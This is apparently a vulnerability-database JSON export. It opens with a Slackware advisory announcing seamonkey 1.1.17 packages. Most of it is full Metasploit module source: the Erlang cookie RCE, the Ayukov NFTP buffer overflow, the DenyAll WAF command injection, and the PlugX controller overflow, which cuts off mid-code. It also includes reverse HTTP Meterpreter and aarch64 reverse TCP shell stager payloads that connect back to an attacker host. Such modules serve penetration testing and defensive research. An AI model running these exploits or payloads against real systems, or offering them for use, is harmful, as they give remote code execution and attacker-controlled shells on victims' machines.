{"href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.425408", "history": [], "bulletinFamily": "unix", "modified": "2009-06-25T00:39:12", "affectedPackage": [{"OS": "Slackware", "packageVersion": "1.1.17", "arch": "i486", "OSVersion": "11.0", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.17-i486-1_slack11.0.tgz", "operator": "lt"}, {"OS": "Slackware", "packageVersion": "1.1.17", "arch": "i486", "OSVersion": "12.1", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.17-i486-1_slack12.1.tgz", "operator": "lt"}, {"OS": "Slackware", "packageVersion": "1.1.17", "arch": "i486", "OSVersion": "12.2", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.17-i486-1_slack12.2.tgz", "operator": "lt"}, {"OS": "Slackware", "packageVersion": "1.1.17", "arch": "i486", "OSVersion": "12.0", "packageName": "seamonkey", "packageFilename": "seamonkey-1.1.17-i486-1_slack12.0.tgz", "operator": "lt"}], "title": "seamonkey", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "description": "New seamonkey packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nMore details about the issues may be found on the Mozilla web site:\n\n http://www.mozilla.org/security/known-vulnerabilities/seamonkey11.html\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/seamonkey-1.1.17-i486-1_slack12.2.tgz:\n Upgraded to seamonkey-1.1.17.\n This release fixes some more security vulnerabilities.\n For more information, see:\n http://www.mozilla.org/security/known-vulnerabilities/seamonkey11.html\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/seamonkey-1.1.17-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/seamonkey-1.1.17-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/seamonkey-1.1.17-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/seamonkey-1.1.17-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-1.1.17-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-1.1.17-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n3c3603ec2f49c3cfd82f9176ccd12528 seamonkey-1.1.17-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n8e366bce9ab46e911ab7b8aff814e720 seamonkey-1.1.17-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n4581a26c229d02be22396e6709de4c5f seamonkey-1.1.17-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n7a6b60712052c6625701a5fe2feab34b seamonkey-1.1.17-i486-1_slack12.2.tgz\n\nSlackware -current package:\n406956f98bfd869038b079c75431ce94 seamonkey-1.1.17-i486-1.txz\n\nSlackware64 -current package:\nf73f2ade76b47fb5403278fa744a1940 seamonkey-1.1.17-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg seamonkey-1.1.17-i486-1_slack12.2.tgz", "viewCount": 0, "published": "2009-06-25T00:39:12", "edition": 1, "hash": "718fa22e3d1563c791425318f18db0fbf16f96d6a7daa81c1b708531d89bc005", "hashmap": [{"key": "affectedPackage", "hash": "d6954fe6c740d03ab30d42260172d6b3"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "a1ce659fcd42a911f5baa504585165d1"}, {"key": "href", "hash": "8ca3a66aefe37f86e430c39a51bf3d83"}, {"key": "modified", "hash": "72b758e0ebaa859416eb6cbc49dfece7"}, {"key": "published", "hash": "72b758e0ebaa859416eb6cbc49dfece7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b92983577b37b1af8509c28b0ddb1402"}, {"key": "title", "hash": "e9cbd7b6aa5b334bece2285a883e9d77"}, {"key": "type", "hash": "30df82153674b65cd46e9942abd854dc"}], "id": "SSA-2009-176-01", "type": "slackware", "lastseen": "2018-02-02T18:11:28", "reporter": "Slackware Linux Project", "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2018-02-02T18:11:28"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/LEGEND_BOT_EXEC"]}, {"type": "talos", "idList": ["TALOS-2015-0069"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122415", "OPENVAS:1361412562310122397", "OPENVAS:136141256231064317", "OPENVAS:136141256231068170", "OPENVAS:136141256231066461", "OPENVAS:68170", "OPENVAS:66461", "OPENVAS:64317", "OPENVAS:136141256231071590", "OPENVAS:71590"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL15787.NASL", "F5_BIGIP_SOL15748.NASL", "F5_BIGIP_SOL10898.NASL", "ORACLELINUX_ELSA-2010-0062.NASL", "ORACLELINUX_ELSA-2009-1620.NASL", "SL_20091130_BIND_ON_SL5_X.NASL", "SL_20100120_BIND_ON_SL5_X.NASL"]}, {"type": "f5", "idList": ["SOL15748"]}], "modified": "2018-02-02T18:11:28"}, "vulnersScore": 3.1}, "objectVersion": "1.3", "references": []}

{"metasploit": [{"lastseen": "2019-10-09T11:59:57", "bulletinFamily": "exploit", "description": "The erlang port mapper daemon is used to coordinate distributed erlang instances. Should an attacker get the authentication cookie RCE is trivial. Usually, this cookie is named \".erlang.cookie\" and varies on location.\n", "modified": "2019-10-05T18:40:27", "published": "2018-12-10T01:17:22", "id": "MSF:EXPLOIT/MULTI/MISC/ERLANG_COOKIE_RCE", "href": "", "type": "metasploit", "title": "Erlang Port Mapper Daemon Cookie RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Erlang Port Mapper Daemon Cookie RCE',\n 'Description' => %q{\n The erlang port mapper daemon is used to coordinate distributed erlang instances.\n Should an attacker get the authentication cookie RCE is trivial. Usually, this\n cookie is named \".erlang.cookie\" and varies on location.\n },\n 'Author' =>\n [\n 'Daniel Mende', # blog post article\n 'Milton Valencia (wetw0rk)', # metasploit module\n ],\n 'References' =>\n [\n ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => 'false',\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},\n ],\n [ 'Linux (CmdStager)',\n 'Type' => :cmdstager,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'CmdStagerFlavor' => ['printf', 'echo', 'bourne']\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},\n ],\n [ 'Windows (CmdStager)',\n 'Type' => :cmdstager,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'CmdStagerFlavor' => ['certutil', 'vbs'],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)\n )\n )\n\n register_options(\n [\n OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),\n Opt::RPORT(25672)\n ])\n end\n\n def generate_challenge_digest(challenge)\n challenge = challenge.unpack('H*')[0].to_i(16).to_s\n\n hash = Digest::MD5.new\n hash.update(datastore['COOKIE'])\n hash.update(challenge)\n\n vprint_status(\"MD5 digest generated: #{hash.hexdigest}\")\n return [hash.hexdigest].pack('H*')\n end\n\n def execute_command(cmd, opts={})\n # SEND: send the message to the node\n send = \"\\x00\\x00\\x00\" # Length:0x00000000\n send << [(0x50 + cmd.length + @our_node.length*2).to_s(16)].pack('H*') #\n send << \"\\x70\" #\n send << \"\\x83\" # VERSION_MAGIC\n send << \"\\x68\" # SMALL_TUPLE_EXT (104)\n send << \"\\x04\" # Arity: 4\n send << \"\\x61\" # SMALL_INTEGER_EXT\n send << \"\\x06\" # Int: 6\n send << \"\\x67\" # PID_EXT (103)\n send << \"\\x64\\x00\" # Node:\n send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)\n send << \"#{@our_node}\" # Node\n send << \"\\x00\\x00\\x00\\x03\" # ID\n send << \"\\x00\\x00\\x00\\x00\" # Serial\n send << \"\\x00\" # Creation\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x00\" # Len: 0x0000\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x03\" # Length: 3\n send << \"rex\" # AtomText: rex\n send << \"\\x83\\x68\\x02\\x67\\x64\\x00\" #\n send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)\n send << \"#{@our_node}\" # Node\n send << \"\\x00\\x00\\x00\\x03\" # ID\n send << \"\\x00\\x00\\x00\\x00\" # Serial\n send << \"\\x00\" # Creation\n send << \"\\x68\" # SMALL_TUPLE_EXT (104)\n send << \"\\x05\" # Arity: 5\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x04\" # Length: 4\n send << \"call\" # AtomText: call\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x02\" # Length: 2\n send << \"os\" # AtomText: os\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x03\" # Length: 3\n send << \"cmd\" # AtomText: cmd\n send << \"\\x6c\" # LIST_EXT\n send << \"\\x00\\x00\\x00\\x01\" # Length: 1\n send << \"\\x6b\" # Elements: k\n send << \"\\x00\" # Tail\n send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)\n send << cmd\n send << \"\\x6a\" # NIL_EXT\n send << \"\\x64\" # InternalSegmentIndex\n send << \"\\x00\\x04\" # Length: 4\n send << \"user\" # AtomText: user\n sock.put(send)\n end\n\n def exploit\n connect\n\n @our_node = \"#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}\"\n\n # SEND_NAME: send initial identification of who \"we\" are\n send_name = \"\\x00\" # Length: 0x0000\n send_name << [(@our_node.length+7).to_s(16)].pack('H*') #\n send_name << \"\\x6e\" # Tag: n\n send_name << \"\\x00\\x05\" # Version: R6 (5)\n send_name << \"\\x00\\x03\\x49\\x9c\" # Flags (0x0003499c)\n send_name << \"#{@our_node}\" # <generated>@<generated>\n\n # SEND_CHALLENGE_REPLY: return generated digest and its own challenge\n send_challenge_reply = \"\\x00\\x15\" # Length: 21\n send_challenge_reply << \"\\x72\" # Tag: r\n\n sock.put(send_name)\n\n # receive servers \"SEND_CHALLENGE\" token (4 bytes)\n print_status(\"Receiving server challenge\")\n challenge = sock.get\n challenge = challenge[14,4]\n\n send_challenge_reply << challenge\n send_challenge_reply << generate_challenge_digest(challenge)\n\n print_status(\"Sending challenge reply\")\n sock.put(send_challenge_reply)\n\n if sock.get.length < 1\n fail_with(Failure::UnexpectedReply, \"Authentication Failed:#{datastore['COOKIE']}\")\n end\n\n print_good(\"Authentication successful, sending payload\")\n\n print_status('Exploiting...')\n if target['Type'] == :cmdstager\n execute_cmdstager(:linemax => 100)\n else\n execute_command(payload.raw)\n end\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/erlang_cookie_rce.rb"}, {"lastseen": "2019-10-13T07:32:18", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP Client 2.0 and earlier. By responding with a long string of data for the SYST request, it is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote code exeuction under the context of the user if successfully exploited.\n", "modified": "2018-01-04T02:52:57", "published": "2017-12-31T15:43:16", "id": "MSF:EXPLOIT/WINDOWS/FTP/AYUKOV_NFTP", "href": "", "type": "metasploit", "title": "Ayukov NFTP FTP Client Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ayukov NFTP FTP Client Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.\n },\n 'Author' =>\n [\n 'Berk Cem Goksel', # Original exploit author\n 'Daniel Teixeira', # MSF module author\n 'sinn3r' # RCA, improved module reliability and user exp\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-15222'],\n [ 'EDB', '43025' ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x01\\x0a\\x10\\x0d\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512\n ],\n 'Privileged' => false,\n 'DefaultOptions' =>\n {\n 'SRVHOST' => '0.0.0.0',\n },\n 'DisclosureDate' => 'Oct 21 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The FTP port to listen on\", 21 ]),\n ])\n end\n\n def exploit\n srv_ip_for_client = datastore['SRVHOST']\n if srv_ip_for_client == '0.0.0.0'\n if datastore['LHOST']\n srv_ip_for_client = datastore['LHOST']\n else\n srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')\n end\n end\n\n srv_port = datastore['SRVPORT']\n\n print_status(\"Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}\")\n super\n end\n\n def on_client_connect(client)\n return if ((p = regenerate_payload(client)) == nil)\n print_status(\"#{client.peerhost} - connected\")\n\n # Let the client log in\n client.get_once\n\n print_status(\"#{client.peerhost} - sending 331 OK\")\n user = \"331 OK.\\r\\n\"\n client.put(user)\n\n client.get_once\n print_status(\"#{client.peerhost} - sending 230 OK\")\n pass = \"230 OK.\\r\\n\"\n client.put(pass)\n\n # It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk\n # is visible from the user's command prompt, which would make the buffer overflow attack too\n # obvious.\n sploit = \"\\x20\"*4116\n\n sploit << [target.ret].pack('V')\n sploit << make_nops(10)\n sploit << payload.encoded\n sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)\n sploit << \"\\r\\n\"\n\n print_status(\"#{client.peerhost} - sending the malicious response\")\n client.put(sploit)\n\n client.get_once\n pwd = \"257\\r\\n\"\n client.put(pwd)\n client.get_once\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/ayukov_nftp.rb"}, {"lastseen": "2019-10-13T22:11:23", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-10-30T19:04:10", "id": "MSF:PAYLOAD/LINUX/PPCE500V2/METERPRETER_REVERSE_HTTP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_http'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_ppce500v2_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1165068\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_PPCE500V2,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttp,\n 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'http',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb"}, {"lastseen": "2019-10-15T11:33:25", "bulletinFamily": "exploit", "description": "This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.\n", "modified": "2019-08-15T23:10:44", "published": "2017-09-19T11:53:37", "id": "MSF:EXPLOIT/LINUX/HTTP/DENYALL_WAF_EXEC", "href": "", "type": "metasploit", "title": "DenyAll Web Application Firewall Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"DenyAll Web Application Firewall Remote Code Execution\",\n 'Description' => %q{\n This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module\n ],\n 'References' =>\n [\n ['CVE', '2017-14706'],\n ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'],\n ['URL', 'https://www.denyall.com/blog/advisories/advisory-unauthenticated-remote-code-execution-denyall-web-application-firewall/']\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 3001,\n 'Payload' => 'python/meterpreter/reverse_tcp'\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [[ 'Automatic', { }]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Sep 19 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])\n ]\n )\n end\n\n def get_token\n # Taking token by exploiting bug on first endpoint.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),\n 'vars_get' => {\n 'applianceUid' => 'LOCALUID',\n 'typeOf' => 'debug'\n }\n })\n\n if res && res.code == 200 && res.body.include?(\"iToken\")\n res.body.scan(/\"iToken\";s:32:\"([a-z][a-f0-9]{31})\";/).flatten[0]\n else\n nil\n end\n end\n\n def check\n # If we've managed to get token, that means target is most likely vulnerable.\n token = get_token\n if token.nil?\n Exploit::CheckCode::Safe\n else\n Exploit::CheckCode::Appears\n end\n end\n\n def exploit\n # Get iToken from unauthenticated accessible endpoint\n print_status('Extracting iToken value')\n token = get_token\n\n if token.nil?\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n else\n print_good(\"Awesome. iToken value = #{token}\")\n end\n\n # Accessing to the vulnerable second endpoint where we have command injection with valid iToken\n print_status('Trigerring command injection vulnerability with iToken value.')\n r = rand_text_alpha(5 + rand(3));\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),\n 'vars_post' => {\n 'iToken' => token,\n 'tag' => 'tunnel',\n 'stime' => r,\n 'type' => \"#{r}$(python -c \\\"#{payload.encoded}\\\")\"\n }\n })\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/denyall_waf_exec.rb"}, {"lastseen": "2019-10-14T16:13:53", "bulletinFamily": "exploit", "description": "dup2 socket in x12, then execve. Connect back to the attacker\n", "modified": "2019-08-15T23:10:44", "published": "2017-08-21T03:04:13", "id": "MSF:PAYLOAD/LINUX/AARCH64/SHELL/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Linux dup2 Command Shell, Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nrequire 'msf/core/handler/reverse_tcp'\n\n\n###\n#\n# ReverseTcp\n# ----------\n#\n# Linux reverse TCP stager.\n#\n###\nmodule MetasploitModule\n\n CachedSize = 212\n\n include Msf::Payload::Stager\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager',\n 'Description' => 'Connect back to the attacker',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_AARCH64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 206, 'n' ],\n 'LHOST' => [ 208, 'ADDR' ],\n },\n 'Payload' =>\n [\n # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s\n 0xd2800040, # mov\tx0, #0x2 \t// #2\n 0xd2800021, # mov\tx1, #0x1 \t// #1\n 0xd2800002, # mov\tx2, #0x0 \t// #0\n 0xd28018c8, # mov\tx8, #0xc6 \t// #198\n 0xd4000001, # svc\t#0x0\n 0xaa0003ec, # mov\tx12, x0\n 0x100005a1, # adr\tx1, cc <sockaddr>\n 0xd2800202, # mov\tx2, #0x10 \t// #16\n 0xd2801968, # mov\tx8, #0xcb \t// #203\n 0xd4000001, # svc\t#0x0\n 0x350004c0, # cbnz\tw0, c0 <failed>\n 0xaa0c03e0, # mov\tx0, x12\n 0xd10043ff, # sub\tsp, sp, #0x10\n 0x910003e1, # mov\tx1, sp\n 0xd2800082, # mov\tx2, #0x4 \t// #4\n 0xd28007e8, # mov\tx8, #0x3f \t// #63\n 0xd4000001, # svc\t#0x0\n 0xb100041f, # cmn\tx0, #0x1\n 0x540003c0, # b.eq\tc0 <failed>\n 0xb94003e2, # ldr\tw2, [sp]\n 0xd34cfc42, # lsr\tx2, x2, #12\n 0x91000442, # add\tx2, x2, #0x1\n 0xd374cc42, # lsl\tx2, x2, #12\n 0xaa1f03e0, # mov\tx0, xzr\n 0xaa0203e1, # mov\tx1, x2\n 0xd28000e2, # mov\tx2, #0x7 \t// #7\n 0xd2800443, # mov\tx3, #0x22 \t// #34\n 0xaa1f03e4, # mov\tx4, xzr\n 0xaa1f03e5, # mov\tx5, xzr\n 0xd2801bc8, # mov\tx8, #0xde \t// #222\n 0xd4000001, # svc\t#0x0\n 0xb100041f, # cmn\tx0, #0x1\n 0x54000200, # b.eq\tc0 <failed>\n 0xb94003e4, # ldr\tw4, [sp]\n 0xf90003e0, # str\tx0, [sp]\n 0xaa0003e3, # mov\tx3, x0\n 0xaa0c03e0, # mov\tx0, x12\n 0xaa0303e1, # mov\tx1, x3\n 0xaa0403e2, # mov\tx2, x4\n 0xd28007e8, # mov\tx8, #0x3f \t// #63\n 0xd4000001, # svc\t#0x0\n 0xb100041f, # cmn\tx0, #0x1\n 0x540000c0, # b.eq\tc0 <failed>\n 0x8b000063, # add\tx3, x3, x0\n 0xeb000084, # subs\tx4, x4, x0\n 0x54fffee1, # b.ne\t90 <read_loop>\n 0xf94003e0, # ldr\tx0, [sp]\n 0xd63f0000, # blr\tx0\n 0xd2800000, # mov\tx0, #0x0 \t// #0\n 0xd2800ba8, # mov\tx8, #0x5d \t// #93\n 0xd4000001, # svc\t#0x0\n 0x5c110002, # .word\t0x5c110002\n 0x0100007f, # .word\t0x0100007f\n ].pack(\"V*\")\n }\n ))\n end\n\n def handle_intermediate_stage(conn, payload)\n print_status(\"Transmitting stage length value...(#{payload.length} bytes)\")\n\n address_format = 'V'\n\n # Transmit our intermediate stager\n conn.put( [ payload.length ].pack(address_format) )\n\n return true\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/aarch64/reverse_tcp.rb"}, {"lastseen": "2019-10-08T19:31:56", "bulletinFamily": "exploit", "description": "This module exploits a Stack buffer overflow in the PlugX Controller (C2 server)\n", "modified": "2019-10-05T18:40:27", "published": "2017-07-29T16:36:42", "id": "MSF:EXPLOIT/WINDOWS/MISC/PLUGX", "href": "", "type": "metasploit", "title": "PlugX Controller Stack Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PlugX Controller Stack Overflow',\n 'Description' => %q{\n This module exploits a Stack buffer overflow in the PlugX Controller (C2 server)\n },\n 'Author' => 'Professor Plum',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'AllowWin32SEH' => true\n },\n 'Payload' =>\n {\n 'Space' => 0xe000,\n 'BadChars' => '',\n 'EncoderType' => Msf::Encoder::Type::AlphanumMixed\n },\n 'Platform' => 'win',\n 'DisclosureDate' => 'Jul 27 2017',\n 'Targets' =>\n [\n ['PlugX Type I (old)', { 'xor' => 0, 'callebp' => 0x004045c4 }],\n ['PlugX Type I', { 'xor' => 1, 'callebp' => 0x004045c4 }],\n ['PlugX Type II', { 'xor' => 2, 'callebp' => 0x004045c4 }]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 2)\n )\n\n register_options(\n [\n Opt::RPORT(13579)\n ]\n )\n end\n\n def xor_stream1(key, src)\n key0 = key1 = key2 = key3 = key\n dst = ''\n for i in 0..(src.size - 1)\n key0 = (key0 + (key0 >> 3) - 0x11111111) & 0xFFFFFFFF\n key1 = (key1 + (key1 >> 5) - 0x22222222) & 0xFFFFFFFF\n key2 = (key2 + 0x44444444 - (key2 << 9)) & 0xFFFFFFFF\n key3 = (key3 + 0x33333333 - (key3 << 7)) & 0xFFFFFFFF\n new_key = (key2 + key3 + key1 + key0) & 0xFF\n res = src[i].ord ^ new_key\n dst += res.chr\n end\n dst\n end\n\n def xor_stream1a(key, src)\n key0 = key1 = key2 = key3 = key\n dst = ''\n for i in 0..(src.size - 1)\n key0 = (key0 + (key0 >> 3) + 3) & 0xFFFFFFFF\n key1 = (key1 + (key1 >> 5) + 5) & 0xFFFFFFFF\n key2 = (key2 - 7 - (key2 << 9)) & 0xFFFFFFFF\n key3 = (key3 - 9 - (key3 << 7)) & 0xFFFFFFFF\n new_key = (key2 + key3 + key1 + key0) & 0xFF\n res = src[i].ord ^ new_key\n dst += res.chr\n end\n dst\n end\n\n def xor_stream2(key, data)\n dst = ''\n for i in 0..(data.size - 1)\n key = (((key << 7) & 0xFFFFFFFF) - ((key >> 3) & 0xFFFFFFFF) + i + 0x713A8FC1) & 0xFFFFFFFF\n dst += ((key & 0xFF) ^ ((key >> 8) & 0xFF) ^ ((key >> 16) & 0xFF) ^ data[i].ord ^ ((key >> 24) & 0xFF)).chr\n end\n dst\n end\n\n def xor_wrap(key, data)\n if target['xor'] == 0\n return xor_stream1a(key, data)\n elsif target['xor'] == 1\n return xor_stream1(key, data)\n elsif target['xor'] == 2\n return xor_stream2(key, data)\n end\n print_status('Unknown PlugX Type')\n end\n\n def validate_response(data)\n if data.nil?\n print_status('Server closed connection')\n return false\n end\n if data.empty?\n print_status('No response received')\n return false\n end\n if data.size < 16\n print_status('Invalid packet')\n print_status(data.inspect)\n return false\n end\n key = data[0..4].unpack('<I')[0]\n hdr = xor_wrap(key, data[0..16])\n _x, _flags, _cmd, comp_size, _uncomp_size, _xx = hdr.unpack('<ISSSSI')\n if (comp_size + 16) == data.size\n raw = xor_wrap(key, data[16..-1])\n print_status(raw.inspect)\n return true\n end\n false\n end\n\n def check\n connect\n key = rand(0xFFFFFFFF)\n hh = [key, 0, 0, 0, 0, 0].pack('<ISSSSI')\n hdr = xor_wrap(key, hh)\n 